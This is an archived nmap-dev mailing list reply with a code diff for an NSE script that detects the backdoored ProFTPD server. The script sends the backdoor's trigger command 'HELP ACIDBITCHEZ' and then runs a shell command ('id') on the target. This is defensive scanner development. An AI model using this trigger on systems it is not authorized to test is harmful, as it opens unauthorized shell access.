Nmap Development mailing list archives
Re: [NSE] Detection of ProFTPD backdoor
From: Michael Meyer <michael.meyer () greenbone net>
Date: Mon, 13 Dec 2010 10:57:31 +0100
*** David Fifield <david () bamsoftware com> wrote:
On Sat, Dec 11, 2010 at 09:50:04AM +0100, Michael Meyer wrote:
+ sock:send("help foo\r\n") + sock:receive_lines(1)Does it also work without the sock:send line?
Yes.
What about using the read_reply function from ftp-anon.nse, does that work?
Yes, the following seems to work.
--- /tmp/2/nmap/scripts/ftp-proftpd-backdoor.nse 2010-12-08 14:09:07.000000000 +0100
+++ /usr/local/share/nmap/scripts/ftp-proftpd-backdoor.nse 2010-12-13 11:06:56.000000000 +0100
@@ -35,6 +35,45 @@
local CMD_FTP = "HELP ACIDBITCHEZ"
local CMD_SHELL = "id"
+local function read_reply(buffer)
+ local readline
+ local line, err
+ local code, message
+ local _, p, tmp
+
+ line, err = buffer()
+ if not line then
+ return line, err
+ end
+
+ -- Single-line response?
+ code, message = string.match(line, "^(%d%d%d) (.*)$")
+ if code then
+ return tonumber(code), message
+ end
+
+ -- Multi-line response?
+ _, p, code, message = string.find(line, "^(%d%d%d)-(.*)$")
+ if p then
+ while true do
+ line, err = buffer()
+ if not line then
+ return line, err
+ end
+ tmp = string.match(line, "^%d%d%d (.*)$")
+ if tmp then
+ message = message .. "\n" .. tmp
+ break
+ end
+ message = message .. "\n" .. line
+ end
+
+ return tonumber(code), message
+ end
+
+ return nil, string.format("Unparseable response: %q", line)
+end
+
portrule = function (host, port)
-- Check if version detection knows what FTP server this is.
if port.version.product ~= nil and port.version.product ~= "ProFTPD" then
@@ -82,15 +121,16 @@
return
end
- -- Send command to escalate privilege.
- status, err = sock:send(CMD_FTP .. "\r\n")
- if not status then
- stdnse.print_debug(1, "Failed to send privilege escalation command: %s", err)
- sock:close()
- return
- end
+ -- Send command to escalate privilege.
+ buffer = stdnse.make_buffer(sock, "\r\n")
+ status, err = sock:send(CMD_FTP .. "\r\n")
+ if not status then
+ return status, err
+ end
+ code, message = read_reply(buffer)
-- Send command(s) to shell, assuming that privilege escalation worked.
status, err = sock:send(cmd .. ";\r\n")
if not status then
stdnse.print_debug(1, "Failed to send shell command(s): %s", err)
------------------------------------------------------------------------------------
Micha
_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/
Current thread:
- Re: [NSE] Detection of ProFTPD backdoor, (continued)
- Re: [NSE] Detection of ProFTPD backdoor Kris Katterjohn (Dec 06)
- Re: [NSE] Detection of ProFTPD backdoor Mak Kolybabi (Dec 07)
- Re: [NSE] Detection of ProFTPD backdoor David Fifield (Dec 07)
- Re: [NSE] Detection of ProFTPD backdoor Kris Katterjohn (Dec 06)
- Re: [NSE] Detection of ProFTPD backdoor Michael Meyer (Dec 07)
- Re: [NSE] Detection of ProFTPD backdoor David Fifield (Dec 07)
- Re: [NSE] Detection of ProFTPD backdoor Michael Meyer (Dec 08)
- Re: [NSE] Detection of ProFTPD backdoor Michael Meyer (Dec 08)
- Re: [NSE] Detection of ProFTPD backdoor Mak Kolybabi (Dec 10)
- Re: [NSE] Detection of ProFTPD backdoor Michael Meyer (Dec 11)
- Re: [NSE] Detection of ProFTPD backdoor David Fifield (Dec 12)
- Re: [NSE] Detection of ProFTPD backdoor Michael Meyer (Dec 13)
- Re: [NSE] Detection of ProFTPD backdoor David Fifield (Dec 29)
- Re: [NSE] Detection of ProFTPD backdoor David Fifield (Dec 07)